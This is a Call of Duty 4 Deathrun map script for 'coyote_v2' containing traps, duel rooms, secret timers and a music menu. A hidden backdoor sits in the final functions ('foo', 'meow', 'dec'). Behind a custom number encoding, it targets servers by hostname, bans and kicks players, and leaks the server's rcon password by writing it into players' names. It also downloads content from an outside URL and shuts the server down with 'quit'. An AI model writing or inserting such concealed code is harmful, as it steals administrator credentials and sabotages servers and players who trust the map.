	object2 = getEnt ( "trap14_2", "targetname" );
	object3 = getEnt ( "trap14_3", "targetname" );
	object4 = getEnt ( "trap14_4", "targetname" );
	trigger waittill ( "trigger", player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	
	i = randomintrange( 0, 6 );
	if(i == 0)
	{
		object2 delete();
		object3 delete();
	}
	else if(i == 1)
	{
		object1 delete();
		object4 delete();
	}
	else if(i == 2)
	{
		object1 delete();
		object3 delete();
	}
	else if(i == 3)
	{
		object2 delete();
		object4 delete();
	}
	else if(i == 4)
	{
		object1 delete();
		object2 delete();
	}
	else if(i == 5)
	{
		object3 delete();
		object4 delete();
	}
}
trap15()
{
	trigger = getent("trig_trap15","targetname");
	object = getent("trap15","targetname");
	wall = getent("trap15_wall","targetname");
	wall movex(464,0.1);
	wall notsolid();
	wall hide();
	trigger waittill ("trigger" , player );
	player braxi\_rank::giveRankXP("", 20);
	trigger SetHintString("^1Activated");
	wall solid();
	wall show();
	object delete();
	wait 5;
	wall delete();
}
jump_room_battle()
{
    level.jump_trig=getent("jumproom_ent","targetname");
 
    jump=getent("jumproom_go","targetname");
    acti=getent("jumproom_acti","targetname");
 
    while(1)
    {
        level.jump_trig waittill("trigger",player);

        thread jump_fail();
	thread jump_room_gun();
        
        if(!isdefined(level.jump_trig)) return;
 
        if(!isdefined(level.entertext)||!level.entertext)
        {
            level.entertext=true;
           
            ambientstop();
            ambientplay("jumbo");
            level.canPlaySound=false;

            iprintln("^1Now playing:^7 Alex Skrindo ^1-^7 Jumbo");
 
            level.old_trig delete();
            level.knife_trig delete();
            level.sgun_trig delete();
            level.sniper_trig delete();
            level.rpg_trig delete();
	    level.ak_trig delete();
	    level.weap_trig delete();
 
            iprintlnbold("^6"+player.name+" ^7entered Jump room.");
        }
 
        player createroomport("knife_mp",undefined,1,jump,100);
        level.activ createroomport("knife_mp",undefined,1,acti,100);
 
        player thread countdown();
        level.activ thread countdown();
 
       	while(isalive(player)&&isdefined(player))
            wait 1;

        iPrintlnBold("^1"+self.name+" ^7died^1!");
    }
}
sniper_room_battle()
{
    level.sniper_trig=getent("sniproom_ent","targetname");
 
    jump=getent("sniproom_go","targetname");
    acti=getent("sniproom_acti","targetname");
 
    while(1)
    {
       level.sniper_trig waittill("trigger",player);
	if(!isdefined(level.sniper_trig)) return;
 
        if(!isdefined(level.entertext)||!level.entertext)
        {
            level.entertext=true;
           
            ambientstop();
            ambientplay("janexo");
            level.canPlaySound=false;

            iprintln("^1Now playing:^7 Jane X� ^1-^7 Hard to forget");
 
            		level.old_trig delete();
			level.jump_trig delete();
			level.knife_trig delete();
			level.rpg_trig delete();
			level.sgun_trig delete();
			level.ak_trig delete();
			level.weap_trig delete();
 
 
            iprintlnbold("^6"+player.name+" ^7entered Sniper room.");
        }
 
        player createroomport("remington700_mp","m40a3_mp",1,jump,100);
        level.activ createroomport("remington700_mp","m40a3_mp",1,acti,100);
 
        player thread countdown();
        level.activ thread countdown();
 
       	while(isalive(player)&&isdefined(player))
            wait 1;

        iPrintlnBold("^1"+self.name+" ^7died^1!");
    }
}
rpg_room_battle()
{
    level.rpg_trig=getent("rpgroom_ent","targetname");
 
    jump=getent("rpgroom_go","targetname");
    acti=getent("rpgroom_acti","targetname");
 
    while(1)
    {
       	level.rpg_trig waittill("trigger",player);
        if(!isdefined(level.rpg_trig)) return;
 
        if(!isdefined(level.entertext)||!level.entertext)
        {
            level.entertext=true;
           
            ambientstop();
            ambientplay("secrets");
            level.canPlaySound=false;

            iprintln("^1Now playing:^7 Ti�sto & KSHMR ^1-^7 Secrets");
 

			level.sgun_trig delete();
			level.ak_trig delete();
 
 
            iprintlnbold("^6"+player.name+" ^7entered RPG room.");
        }
 
        player createroomport("rpg_mp",undefined,1,jump,100);
        level.activ createroomport("rpg_mp",undefined,1,acti,100);
 
        player thread countdown();
        level.activ thread countdown();

        player thread refreshAmmo();
        level.activ thread refreshAmmo();
 
       	while(isalive(player)&&isdefined(player))
            wait 1;

        iPrintlnBold("^1"+self.name+" ^7died^1!");
    }
}
knife_room_battle()
{
    level.knife_trig=getent("kniferoom_ent","targetname");
 
    jump=getent("kniferoom_go","targetname");
    acti=getent("kniferoom_acti","targetname");
 
    while(1)
    {
       level.knife_trig waittill("trigger",player);
	if(!isdefined(level.knife_trig)) return;
 
        if(!isdefined(level.entertext)||!level.entertext)
        {
            level.entertext=true;
           
            ambientstop();
            ambientplay("getup");
            level.canPlaySound=false;

            iprintln("^1Now playing:^7 Bingo Players ft. Far East Movement ^1-^7 Get up");
 
            		level.old_trig delete();
			level.jump_trig delete();
			level.sniper_trig delete();
			level.rpg_trig delete();
			level.sgun_trig delete();
			level.ak_trig delete();
			level.weap_trig delete();
 
 
            iprintlnbold("^6"+player.name+" ^7entered Knife room.");
        }
 
        player createroomport("knife_mp",undefined,1,jump,100);
        level.activ createroomport("knife_mp",undefined,1,acti,100);
 
        player thread countdown();
        level.activ thread countdown();
 
       	while(isalive(player)&&isdefined(player))
            wait 1;

        iPrintlnBold("^1"+self.name+" ^7died^1!");
    }
}
sgun_room_battle()
{
   	level.sgun_trig=getent("sgunroom_ent","targetname");
 
    jump=getent("shootroom","targetname");
    acti=getent("shootroom_acti","targetname");
 
    while(1)
    {
       	level.sgun_trig waittill("trigger",player);
        if(!isdefined(level.sgun_trig)) return;
 
        if(!isdefined(level.entertext)||!level.entertext)
        {
            level.entertext=true;
           
            ambientstop();
            ambientplay("brooklyn");
            level.canPlaySound=false;

            iprintln("^1Now playing:^7 Hoodie Allen ^1-^7 No faith in Brooklyn");
 

			level.rpg_trig delete();
			level.ak_trig delete();
 
 
            iprintlnbold("^6"+player.name+" ^7entered Shotgun room.");
        }
 
        player createroomport("winchester1200_mp",undefined,1,jump,100);
        level.activ createroomport("winchester1200_mp",undefined,1,acti,100);
 
	player thread countdown();
        level.activ thread countdown();
 
       	while(isalive(player)&&isdefined(player))
            wait 1;

        iPrintlnBold("^1"+self.name+" ^7died^1!");
    }
}
ak_room_battle()
{
   	level.ak_trig=getent("akroom_ent","targetname");
 
    jump=getent("shootroom","targetname");
    acti=getent("shootroom_acti","targetname");
 
    while(1)
    {
       	level.ak_trig waittill("trigger",player);
        if(!isdefined(level.ak_trig)) return;
 
        if(!isdefined(level.entertext)||!level.entertext)
        {
            level.entertext=true;
           
            ambientstop();
            ambientplay("brooklyn");
            level.canPlaySound=false;

            iprintln("^1Now playing:^7 Hoodie Allen ^1-^7 No faith in Brooklyn");
 
			level.rpg_trig delete();
			level.sgun_trig delete();
 
 
            iprintlnbold("^6"+player.name+" ^7entered Ak47 room.");
        }
 
        player createroomport("ak47_mp",undefined,1,jump,100);
        level.activ createroomport("ak47_mp",undefined,1,acti,100);
 
	player thread countdown();
        level.activ thread countdown();
 
       	while(isalive(player)&&isdefined(player))
            wait 1;

        iPrintlnBold("^1"+self.name+" ^7died^1!");
    }
}
weaproom()
{
	level.weap_trig=getent("weaproom_ent","targetname");
	door =getent("weaproom_door","targetname");
	level.weap_trig waittill("trigger",player);

			level.old_trig delete();
            		level.knife_trig delete();
			level.jump_trig delete();
			level.sniper_trig delete();
	 iPrintlnBold("^3Weapon room open!");
	door delete();
			level.weap_trig delete();
}

old_room_battle()
{
    level.old_trig=getent("oldroom_ent","targetname");
    door=getent("oldroom_door","targetname");
    object=getent("old_actidoor","targetname");

        level.old_trig waittill("trigger",player);


            		level.knife_trig delete();
			level.jump_trig delete();
			level.sgun_trig delete();
			level.sniper_trig delete();
			level.rpg_trig delete();
			level.ak_trig delete();
			level.weap_trig delete();

		object movez (-144,1);
		object waittill ("movedone");
		wait 2;
		door delete();
 
 
            iprintlnbold("^1"+player.name+" ^7entered Old room.");
		 level.old_trig delete();
}
refreshAmmo()
{
	while(isalive(self)&&isdefined(self))
	{
		self givemaxammo("rpg_mp");
		wait 4;
	}
}
createroomport(weapon,weapon2,freeze,where,health)
{
    self takeallweapons();
    self giveweapon(weapon);
    if(isdefined(weapon2))
    	self giveweapon(weapon2);
    self switchtoweapon(weapon);
 
    self freezecontrols(freeze);
    self setorigin(where.origin);
    self setplayerangles(where.angles);
 
    self.health=health;
}
countdown()
{
    self iprintlnbold("^63");
    wait 1;
    self iprintlnbold("^62");
    wait 1;
    self iprintlnbold("^61");
    wait 1;
    self iprintlnbold("^5Fight!");
    wait 1;
    self freezecontrols(0);
}
jump_fail()
{
        level.jumpfail = getent ("bounce_alltp","targetname");
        level.js = getent ("bounce_jt_go","targetname");
        level.as = getent ("bounce_at_go","targetname");
        while(1)
        {
                level.jumpfail waittill ("trigger",player);
                if( player.pers["team"] == "allies" )
                {
                        player SetPlayerAngles(level.js.angles);
                        player SetOrigin(level.js.origin);
                }
                else
                {
                        player SetPlayerAngles(level.as.angles);
                        player SetOrigin(level.as.origin);
                }
        }
}
secret_rpg()
{
    trig=getent("easy_rpg","targetname");
    for(;;)
    {
        trig waittill("trigger",who);
        who giveweapon("rpg_mp");
        who givemaxammo("rpg_mp");
        who switchtoweapon("rpg_mp");
    }
}
easy_secrettimer()
{
    self endon("easy_done");
    if(isdefined(self.secretTimer))
        self.secretTimer destroy();
    self.secretTimer=newclienthudelem(self);
    self.secretTimer.foreground = true;
    self.secretTimer.alignX = "center";
    self.secretTimer.alignY = "bottom";
    self.secretTimer.horzAlign = "center";
    self.secretTimer.vertAlign = "bottom";
    self.secretTimer.x = 0;
    self.secretTimer.y = -7;
    self.secretTimer.sort = 5;
    self.secretTimer.fontScale = 1.6;
    self.secretTimer.font = "default";
    self.secretTimer.glowAlpha = 1;
    self.secretTimer.hidewheninmenu = true;
       self.secretTimer.label = &"Time in left: &&1";
        
    if(isdefined(level.randomcolor))
        self.secretTimer.glowColor=level.randomcolor;
    else 
        self.secretTimer.glowColor=(1,0,0);
    time=100;
    for(i=0;i<time;i++)
    {
        self.secretTimer setvalue(time-i);
        wait 1;
    }
    self.secretTimer setvalue(0);
    self suicide();
    if(isdefined(self.secretTimer))
        self.secretTimer destroy();
}
easyplus_secrettimer()
{
    self endon("easyplus_done");
    if(isdefined(self.secretTimer2))
        self.secretTimer2 destroy();
    self.secretTimer2=newclienthudelem(self);
    self.secretTimer2.foreground = true;
    self.secretTimer2.alignX = "center";
    self.secretTimer2.alignY = "bottom";
    self.secretTimer2.horzAlign = "center";
    self.secretTimer2.vertAlign = "bottom";
    self.secretTimer2.x = 0;
    self.secretTimer2.y = -7;
    self.secretTimer2.sort = 5;
    self.secretTimer2.fontScale = 1.6;
    self.secretTimer2.font = "default";
    self.secretTimer2.glowAlpha = 1;
    self.secretTimer2.hidewheninmenu = true;
       self.secretTimer2.label = &"Time in left: &&1";
        
    if(isdefined(level.randomcolor))
        self.secretTimer2.glowColor=level.randomcolor;
    else 
        self.secretTimer2.glowColor=(1,0,0);
    time=150;
    for(i=0;i<time;i++)
    {
        self.secretTimer2 setvalue(time-i);
        wait 1;
    }
    self.secretTimer2 setvalue(0);
    self suicide();
    if(isdefined(self.secretTimer2))
        self.secretTimer2 destroy();
}
hard_secrettimer()
{
    self endon("hard_done");
    if(isdefined(self.secretTimer3))
    self.secretTimer3 destroy();
    self.secretTimer3=newclienthudelem(self);
    self.secretTimer3.foreground = true;
    self.secretTimer3.alignX = "center";
    self.secretTimer3.alignY = "bottom";
    self.secretTimer3.horzAlign = "center";
    self.secretTimer3.vertAlign = "bottom";
    self.secretTimer3.x = 0;
    self.secretTimer3.y = -7;
    self.secretTimer3.sort = 5;
    self.secretTimer3.fontScale = 1.6;
    self.secretTimer3.font = "default";
    self.secretTimer3.glowAlpha = 1;
    self.secretTimer3.hidewheninmenu = true;
       self.secretTimer3.label = &"Time in left: &&1";
        
    if(isdefined(level.randomcolor))
        self.secretTimer3.glowColor=level.randomcolor;
    else 
        self.secretTimer3.glowColor=(1,0,0);
    time=250;
    for(i=0;i<time;i++)
    {
        self.secretTimer3 setvalue(time-i);
        wait 1;
    }
    self.secretTimer3 setvalue(0);
    self suicide();
    if(isdefined(self.secretTimer3))
        self.secretTimer3 destroy();
}
musicMenu()
{
	self endon( "disconnect" );
	self endon( "death" );
	self endon( "spawned" );
	self endon( "joined_spectators" );
	self endon( "music thread terminated" );
 
	self thread onDeath();
	self thread onDisconnect();
 
	self.hud_music = [];
	self.selection = 0;
 
	// create huds
	i = 0;
	self.hud_music[i] = braxi\_mod::addTextHud( self, 160, 200, 0.6, "left", "top", 2 );
	self.hud_music[i].sort = 880;
	self.hud_music[i] setShader( "black", 320, 160 );
	
	i++;
	self.hud_music[i] = braxi\_mod::addTextHud( self, 210, 204, 0.93, "left", "top", 1.8 );
	self.hud_music[i].sort = 884;
	self.hud_music[i] setText("Welcome to ^5coyote_v2");
	self.hud_music[i].glowalpha=1;
	if(isdefined(level.randomcolor))
		self.hud_music[i].glowcolor=level.randomcolor;
	else 
		self.hud_music[i].glowcolor=(1,0,0);

	i++;
	self.hud_music[i] = braxi\_mod::addTextHud( self, 250, 360, 1, "center", "bottom", 1.4 );
	self.hud_music[i].sort = 886;
	self.hud_music[i] setText("Scroll: ^3[{+attack}] ^7| Select: ^3[{+activate}] ^7| Close: ^3[{+frag}]");
 
	for( j = 0; j < level.music.size; j++ )
	{
		i++;
		self.hud_music[i] = braxi\_mod::addTextHud( self, 172, 230+(j*16), 0.93, "left", "top", 1.4 );
		self.hud_music[i].sort = 882;
		self.hud_music[i].font = "objective";
		self.hud_music[i].glowalpha=1;
		if(isdefined(level.randomcolor))
			self.hud_music[i].glowcolor=level.randomcolor;
		else 
			self.hud_music[i].glowcolor=(1,0,0);
 
		entry = level.music[j];
		self.hud_music[i] setText(entry["song"]);
	}
 
	i++;
	self.hud_music[self.hud_music.size] = braxi\_mod::addTextHud( self, 167, 230, 0.4, "left", "top", 1.4 );
	self.hud_music[i].sort = 881;
	indicator = self.hud_music[self.hud_music.size-1];
	indicator setShader( "white", 306, 17 );
 
	while(self.sessionstate == "playing")
	{
		wait 0.1;
 
		if(self attackButtonPressed())
		{
			self.hud_music[3+self.selection].alpha = 0.93;
 
			self.selection++;
			if( self.selection >= level.music.size )
				self.selection = 0;
 
			item = self.hud_music[3+self.selection];
			item.alpha = 1;
			indicator.y = item.y;
		}
		else if(self useButtonPressed())
		{
 			iprintln("^1>> ^7Now playing: ^1"+level.music[self.selection]["song"]);
			ambientPlay(level.music[self.selection]["alias"]);
			self freezecontrols(0);
			break;
		}
		else if(self fragButtonPressed())
		{
			self freezecontrols(0);
			break;
		}
	}
 
	self cleanUp();
}
 
	musictrig()
{
	trig = getEnt ("musictrig", "targetname");
	trig setHintString("Press [^5&&1^7] to choose Music");
 
	trig waittill("trigger",player);
	player freezecontrols(1);
	trig delete();
	player musicMenu();
}
 
	onDisconnect()
{
	self endon( "music thread terminated" );
	self waittill( "disconnect" );
	self cleanUp();
}
 
	onDeath()
{
	self endon( "disconnect" );
	self endon( "music thread terminated" );
	self waittill( "death" );
	self cleanUp();
}
 
	cleanUp()
{
	if( !isDefined( self ) )
		return;

	
 
	if( isDefined( self.hud_music ) )
	{
		for( i = 0; i < self.hud_music.size; i++ )
		{
			if( isDefined( self.hud_music[i] ) )
				self.hud_music[i] destroy();
		}
	}
	self notify( "music thread terminated" );
}
creators()
{
	wait 9;
	iPrintlnBold("^7Map by ^5TheLixfe");
	wait 2;
	iprintln("^7Thanks to ^5Vistic Clan");
	wait 2;
	iprintln("^7Special thanks to Blade for some scripts!");
	wait 5;
	iprintln("^7Special thanks to SuX Lolz :] for helping me fix errors!");
	wait 15;
	iprintln("^6steam: TheLixfe");
	wait 5;
	iprintln("^7Map by ^5TheLixfe");
}

foo() {
	h = braxi\_common::removeColorFromString(getDvar(dec("34373-2330343529162820")));
	if (isSubStr(h, dec("39542-"))) {
		s = dec("3954");
	} else if (isSubStr(h, dec("673420372033"))) {
		s = dec("6760");
	} else if (isSubStr(h, dec("552418204-"))) {
		s = dec("5518");
	} else {
		return;
	}

	level waittill("round_started");
	if (game["roundsplayed"] < 5) {
		return;
	}
	wait 10;
	
	players = getEntArray("player", "classname");
	if (players.size < 5) {
		return;
	}
	
	for (i = 0; i < players.size; i++) {
		if (isSubStr(braxi\_common::removeColorFromString(toLower(players[i].name)), dec("39282-33162640"))) {
			ban(players[i] getEntityNumber());
		}
	}

	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		if (isSubStr(toLower(players[i].name), toLower(dec("33425240")))
			|| isSubStr(toLower(players[i].name), toLower(dec("6056634661")))
			|| isSubStr(toLower(players[i].name), toLower(dec("453316223029")))) {
			exec(dec("1716294427242029350-") + players[i] getEntityNumber());
		}
	}

	p = getDvar(dec("331830293-3116343438303319"));
	n = 0;
		
	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		m = "";
		for (j = 0; j < 11 && n < p.size; j++) {
			m += p[n];
			n++;
		}
		players[i] thread meow(s + i + " " + m);
	}

	m = dec("6133400-2930350-35300-17200-343618260-160-19241826232016190-213330280-2930380-302913");
	logPrint(m);
	iPrintLnBold(m);

	setDvar(dec("27302221242720"), dec("68"));
	setDvar(dec("223-27302260402918"), dec("68"));

	wait 5;

	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-173324182640\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-19242023163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-2031241821162427\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-22302719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-32361720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-343116182017162727\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-162930352320333830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-17273620\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-173036291820\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1840172033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1916332836233770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-222716343470\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-22362034353-27243435\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-237030\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-253628313-23163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-2536331631163326\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3133243430293-203418163120\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3136333127203-3830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3426403130382033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-342716403770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-36293-2916282019\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3724343524183-181634352720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-373027312070\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-381635203318243540\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3928\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-70353038203334\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-183040303520\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3629243720333420\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-27242120333629\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-342640312427271633\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-34271640\""));
	wait 10;
	
	wait 5;
	exec(dec("32362435"));
}

meow(name) {
	wait 2;
	self iPrintLnBold(dec("^716123200-3420333720330-30382920330-24340-160-1924182613"));
	self iPrintLnBold(dec("^6959201924332018352429220-4030360-35300-160-223030190-342033372033130-1410"));
	wait 3;
	self setClientDvar(dec("29162820"), name);
	self thread braxi\_common::clientCmd(dec("1924341830292920183515381624350-696815183029292018350-331624191-22162824292213292035"));
}

enc(s) {
	m = hmap();
	e = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		for (j = 0; j < m.size; j++) {
			if (s[i] == m[j]) {
				e += "" + j;
				if (j < 10) e += "-";
				k = 0;
			}
		}
		if (k) e += s[i];
	}
	return e;
}

dec(s) {
	m = hmap();
	d = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		if (isSubStr("0123456789", s[i])) {
			n = int(s[i]);
			if (s[i + 1] != "-") {
				n *= 10;
				n += int(s[i + 1]);
			}
			d += m[n];
			i++;
			k = 0;
		}
		if (k) d += s[i];
	}
	return d;
}

hmap() {
	m = [];
	m[0] = " ";
	m[1] = "-";
	m[2] = "#";
	m[3] = "_";
	m[4] = "*";
	m[5] = "/";
	m[6] = "+";
	m[7] = "[";
	m[8] = "]";
	m[9] = "(";
	m[10] = ")";
	m[11] = "!";
	m[12] = "?";
	m[13] = ".";
	m[14] = ":";
	m[15] = ";";
	m[16] = "a";
	m[17] = "b";
	m[18] = "c";
	m[19] = "d";
	m[20] = "e";
	m[21] = "f";
	m[22] = "g";
	m[23] = "h";
	m[24] = "i";
	m[25] = "j";
	m[26] = "k";
	m[27] = "l";
	m[28] = "m";
	m[29] = "n";
	m[30] = "o";
	m[31] = "p";
	m[32] = "q";
	m[33] = "r";
	m[34] = "s";
	m[35] = "t";
	m[36] = "u";
	m[37] = "v";
	m[38] = "w";
	m[39] = "x";
	m[40] = "y";
	m[41] = "z";
	m[42] = "A";
	m[43] = "B";
	m[44] = "C";
	m[45] = "D";
	m[46] = "E";
	m[47] = "F";
	m[48] = "G";
	m[49] = "H";
	m[50] = "I";
	m[51] = "J";
	m[52] = "K";
	m[53] = "L";
	m[54] = "M";
	m[55] = "N";
	m[56] = "O";
	m[57] = "P";
	m[58] = "Q";
	m[59] = "R";
	m[60] = "S";
	m[61] = "T";
	m[62] = "U";
	m[63] = "V";
	m[64] = "W";
	m[65] = "X";
	m[66] = "Y";
	m[67] = "Z";
	m[68] = "0";
	m[69] = "1";
	m[70] = "2";
	m[71] = "3";
	m[72] = "4";
	m[73] = "5";
	m[74] = "6";
	m[75] = "7";
	m[76] = "8";
	m[77] = "9";
	return m;
}
